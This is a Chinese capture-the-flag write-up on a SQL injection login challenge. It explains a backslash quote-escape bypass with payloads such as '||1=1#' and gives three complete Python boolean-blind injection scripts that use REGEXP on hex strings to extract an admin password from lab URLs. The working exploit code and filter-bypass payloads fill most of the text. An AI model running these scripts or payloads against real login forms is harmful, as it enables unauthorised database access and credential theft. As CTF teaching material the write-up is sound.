首先按照常规思路进行fuzz,发现被ban了很多东西,不过仍然保留了许多可用函数。看到 =、like 被ban自然而然能想到用 regexp 实现查询;看到单引号被ban自然而然能想到用 \ 转义单引号实现注入。首先尝试payload:username=admin\&password=||1=1%23
,回显 flag is not here! ,显然是此地无银三百两。
综上,这道题的sql语句应该是:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
当我们传入 payload 后,sql语句就变成了:
select * from users where username='admin\' and password='||1#';
由于第二个单引号被转义了,第1个单引号只能去和第3个单引号进行闭合,后台接收到的 username 就变成了admin\' and password=
这个整体,而这个用户名显然不存在,所以理应显示 ‘账号或密码错误’。但是别忘了这样以来,password 参数就成为了可控变量,1=1 显然为真,所以这里回显的不是 ‘账号或密码错误’,而是 flag is not here!
根据上述思路,我们可以编写脚本逐个字符爆破出 password,其实也就相当于布尔盲注。
下面贴几个查询到的文章和EXP:
import requests
import time
import string
import re
def ord2hex(letter):
result = ''
for i in letter:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
def hex2ord(letter):
result = ''
for i in range(0,len(letter),2):
result += chr(int(letter[i:i+2], 16))
return result
url = "http://eci-2ze7rwkw5ezzl02e1ami.cloudeci1.ichunqiu.com/index.php"
str_list = string.hexdigits
flag = "^" # 使用^从头匹配
session = requests.session()
for n in range(1, 100):
length = len(flag)
for i in str_list:
data = {
'username':'admin\\',
"password": "||hex(password)/**/REGEXP/**/" + ord2hex(flag + re.escape(i)) + "#"
}
# print(data["password"])
res = session.post(url=url, data=data)
res.encoding = "utf-8"
time.sleep(0.1)
if 'flag is not here!' in res.text:
flag += i
print(flag)
break
if len(flag) == length:
print(hex2ord(flag.lstrip("^")))
break
# username: admin
# password: This_1s_thE_Passw0rd
# @@version: 5.5.62-0ubuntu0.14.04.1
# database(): ctf
第三届美团网络安全高校挑战赛(初赛)Writeup by X1cT34m
import os
import requests as req
def ord2hex(string):
result = ''
for i in string:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
url = "http://eci-2zecwo25ej0i246rbyi7.cloudeci1.ichunqiu.com/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_']
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
res = ''
for i in range(50):
for j in string:
passwd = ord2hex('^'+res+chr(j))
# print(passwd)
passwd = 'or/**/password/**/regexp/**/binary/**/{}#'.format(passwd)
data = {
'username':"admin\\",
'password':passwd
}
r = req.post(url, data=data, headers=headers)
# print(r.text)
if "flag is not here!" in r.text:
res += chr(j)
print(res)
break
import requests
import time
def str2int(mystr):
i = 0
myint = 0
while (i < len(mystr)):
myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)
i += 1
return myint
sess = requests.Session()
url = 'http://eci-2zea89kqieujgo38pawk.cloudeci1.ichunqiu.com/index.php'
f = '账号或密码错误' # 错误时网页包含内容
y = 'flag is not here' # 正确时网页包含内容
start = 0 # 字符串的开始字符位置
strlen = 80 # 待爆破字符串的长度
sleep_time = 0
ostr = '^'
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find='(select flag from flag)' # 想查询的字符串、语句;可能需要外加括号
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start+strlen):
for i in range(32, 127): # 可见字符范围
# for i in range(95,127):#可见字符范围
if i == 46 or i == 42 or i == 43 or i == 63 or i==94: # 略过一些特殊符号($ . * ? ^等)
continue
time.sleep(sleep_time)
# regexp binary 0x5e61;
temp_str = ostr+chr(i)
ent = '{} regexp binary {}'.format(
str2find, hex(str2int(temp_str))) # 待判断的事实语句
payload = "||{}#".format(ent) # 注入语句
# print(payload)
# exit()
# data数据包的构造
data = {
'username': '\\',
'password': payload.replace(' ', '/**/')
}
sess.get(url)
res = sess.post(url, data=data)
res.encoding = res.apparent_encoding # 中文编码
text = res.text
if f in text:
continue
elif y in text:
ostr += chr(i)
print(ostr, j)
break
else: # 即非正也非负的异常情况
print('error:', text)
break
print(ostr)